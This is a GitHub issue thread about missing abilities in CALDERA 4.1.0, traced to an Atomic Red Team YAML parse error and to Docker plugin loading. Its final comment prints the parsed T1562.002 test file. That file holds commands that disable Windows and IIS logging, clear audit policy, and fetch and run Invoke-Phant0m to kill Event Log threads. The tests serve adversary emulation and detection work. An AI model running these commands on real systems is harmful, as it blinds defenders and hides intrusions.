### ISSUE TITLE
Missing abilities in CALDERA when deploying/upgrading CALDERA 4.1.0

### ISSUE THREAD

**Issue by Mr-Fett** [mitre/caldera#2701]
**Describe the bug**
Not seeing all abilities when following along with the installation instructions.

**To Reproduce**
1. Follow install instructions found here: https://caldera.readthedocs.io/en/latest/Installing-CALDERA.html

**Expected behavior**
After attempting to update Caldera to the latest 4.1.0 version. Following the documentation found here: https://caldera.readthedocs.io/en/latest/Installing-CALDERA.html

I was able to successfully deploy caldera using the default conf file using the command: 
"python3 server.py"

What was interesting is that I do not believe all of the abilities are successfully loaded into CALDERA upon installation. I was previously seeing a little less than 1300 abilities in the Abilities section. Now I am only seeing 180 after the new update. 

**Screenshots**
![Caldera Abilities_screenshot](https://user-images.githubusercontent.com/50209261/206021718-115a3fc0-6b38-451c-848c-cd9f70e9cbcc.png)

**Desktop (please complete the following information):**
 - OS: Ubuntu 20.04 amd 64
 - Browser: Firefox
 - Version: 107.0.1 

**Additional context**
Not entirely sure what is going on here, but I thought I should raise this up as I know that I had close to 1300 abilities before the update to the 1.4.1 release.

**Comment by Mr-Fett** [comment]
Just tried to rebuilt it again and saw these error messages. Maybe this might help determine what is happening:

![image](https://user-images.githubusercontent.com/50209261/206262386-36998e54-7cf2-410e-a171-f85f32a9efb5.png)

**Comment by JasonBourne1998** [comment]
> lt it again and saw these error messages. Maybe this might help determine what is happeni

Hi @Mr-Fett Have you solved this problem?

**Comment by JasonBourne1998** [comment]
> Just tried to rebuilt it again and saw these error messages. Maybe this might help determine what is happening:
> 
> ![image](https://user-images.githubusercontent.com/50209261/206262386-36998e54-7cf2-410e-a171-f85f32a9efb5.png)

Actually I am afraid that everyone is facing this problem for they delete the ability data in WebUI

**Comment by Mr-Fett** [comment]
There is a solution by going in a removing the spaces in the T1562.002.yaml file at line 35, column, 24. 

But I believe this was fixed here: https://github.com/redcanaryco/atomic-red-team/pull/2245

**Comment by JasonBourne1998** [comment]
> There is a solution by going in a removing the hanging tab in the T1562.002.yaml file at line 35, column, 24.
> 
> But I believe this was fixed here: [redcanaryco/atomic-red-team#2245](https://github.com/redcanaryco/atomic-red-team/pull/2245)

Thanks for your answer @Mr-Fett , but I think this bug has already been fixed automaticlly, and my terminal displays no error when loading the atomic plugin, but the abilities are still only 159.
![1671077403736](https://user-images.githubusercontent.com/51346614/207770642-c21844ec-fc8f-40c2-bcf0-eb24d6a4ba69.png)
![1671077495962](https://user-images.githubusercontent.com/51346614/207770759-d9824742-d682-48c0-89f5-8b1b5d1dc5ec.png)

**Comment by JasonBourne1998** [comment]
> There is a solution by going in a removing the hanging tab in the T1562.002.yaml file at line 35, column, 24.
> 
> But I believe this was fixed here: [redcanaryco/atomic-red-team#2245](https://github.com/redcanaryco/atomic-red-team/pull/2245)

Woow, I got your point, in docker it did not load the atomic plugin normally, so that's why I can't access it. If I swatch to use python to drive Caldera, everything seems to be OK. Thanks so much for your guidance.

**Comment by Seif-AW** [comment]
I am using caldera 4.2.0, while using docker I encountered the same issue. and i didn't encounter an issue in the T1562.002.yaml  file as seen below:
```
python3 -c 'import yaml, sys; print(yaml.safe_load(sys.stdin))'< T1562.002.yaml 
{'attack_technique': 'T1562.002', 'display_name': 'Impair Defenses: Disable Windows Event Logging', 'atomic_tests': [{'name': 'Disable Windows IIS HTTP Logging', 'auto_generated_guid': '69435dcf-c66f-4ec0-a8b1-82beb76b34db', 'description': 'Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).\nThis action requires HTTP logging configurations in IIS to be unlocked.\n\nUse the cleanup commands to restore some default auditpol settings (your original settings will be lost)\n', 'supported_platforms': ['windows'], 'input_arguments': {'website_name': {'description': 'The name of the website on a server', 'type': 'string', 'default': 'Default Web Site'}}, 'executor': {'command': 'C:\\Windows\\System32\\inetsrv\\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true\n', 'cleanup_command': 'if(Test-Path "C:\\Windows\\System32\\inetsrv\\appcmd.exe"){\n  C:\\Windows\\System32\\inetsrv\\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null\n}\n', 'name': 'powershell'}}, {'name': 'Disable Windows IIS HTTP Logging via PowerShell', 'auto_generated_guid': 'a957fb0f-1e85-49b2-a211-413366784b1e', 'description': 'Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).\nThis action requires HTTP logging configurations in IIS to be unlocked.\n\n Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)\n', 'supported_platforms': ['windows'], 'input_arguments': {'website_name': {'description': 'The name of the website on a server', 'type': 'string', 'default': 'Default Web Site'}}, 'executor': {'command': 'set-WebConfigurationProperty -PSPath "IIS:\\Sites\\#{website_name}\\" -filter "system.webServer/httpLogging" -name dontLog -value $true\n', 'cleanup_command': 'if(Test-Path "C:\\Windows\\System32\\inetsrv\\appcmd.exe"){\n  C:\\Windows\\System32\\inetsrv\\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null\n}\n', 'name': 'powershell'}}, {'name': 'Kill Event Log Service Threads', 'auto_generated_guid': '41ac52ba-5d5e-40c0-b267-573ed90489bd', 'description': 'Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html', 'supported_platforms': ['windows'], 'executor': {'command': 'Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\n$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"\n$output = "$env:TEMP\\Invoke-Phant0m.ps1"\n$wc = New-Object System.Net.WebClient\n$wc.DownloadFile($url, $output)\ncd $env:TEMP\nImport-Module .\\Invoke-Phant0m.ps1\nInvoke-Phant0m\n', 'cleanup_command': 'Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red\nRemove-Item "$env:TEMP\\Invoke-Phant0m.ps1" -ErrorAction Ignore\n', 'name': 'powershell', 'elevation_required': True}}, {'name': 'Impair Windows Audit Log Policy', 'auto_generated_guid': '5102a3a7-e2d7-4129-9e45-f483f2e0eea8', 'description': 'Disables the windows audit policy to prevent key host based telemetry being written into the event logs.\n[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)', 'supported_platforms': ['windows'], 'executor': {'command': 'auditpol /set /category:"Account Logon" /success:disable /failure:disable\nauditpol /set /category:"Logon/Logoff" /success:disable /failure:disable\nauditpol /set /category:"Detailed Tracking" /success:disable\n', 'cleanup_command': 'auditpol /set /category:"Account Logon" /success:enable /failure:enable\nauditpol /set /category:"Detailed Tracking" /success:enable\nauditpol /set /category:"Logon/Logoff" /success:enable /failure:enable\n', 'name': 'command_prompt', 'elevation_required': True}}, {'name': 'Clear Windows Audit Policy Config', 'auto_generated_guid': '913c0e4e-4b37-4b78-ad0b-90e7b25010f6', 'description': 'Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.', 'supported_platforms': ['windows'], 'executor': {'command': 'auditpol /clear /y\nauditpol /remove /allusers\n', 'cleanup_command': 'auditpol /set /category:"Account Logon" /success:enable /failure:enable\nauditpol /set /category:"Detailed Tracking" /success:enable\nauditpol /set /category:"Logon/Logoff" /success:enable /failure:enable\n', 'name': 'command_prompt', 'elevation_required': True}}, {'name': 'Disable Event Logging with wevtutil', 'auto_generated_guid': 'b26a3340-dad7-4360-9176-706269c74103', 'description': 'Wevtutil can be used to disable logs. \nNOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.\n', 'supported_platforms': ['windows'], 'input_arguments': {'log_name': {'description': 'Name of the log to be disabled', 'type': 'string', 'default': 'Microsoft-Windows-IKE/Operational'}}, 'executor': {'command': 'wevtutil sl "#{log_name}" /e:false\n', 'cleanup_command': 'wevtutil sl "#{log_name}" /e:true\n', 'name': 'command_prompt'}}, {'name': 'Makes Eventlog blind with Phant0m', 'auto_generated_guid': '3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741', 'description': 'Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog\n', 'supported_platforms': ['windows'], 'input_arguments': {'file_name': {'description': 'exe version of Phant0m', 'type': 'path', 'default': 'PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe'}}, 'dependency_executor_name': 'powershell', 'dependencies': [{'description': 'Phant0m.exe must exist on disk at specified location (#{file_name})\n', 'prereq_command': 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}\n', 'get_prereq_command': 'New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null\nInvoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing\n'}], 'executor': {'command': '"#{file_name}"\n', 'cleanup_command': 'echo "Sorry you have to reboot"\n', 'name': 'command_prompt'}}]}
```
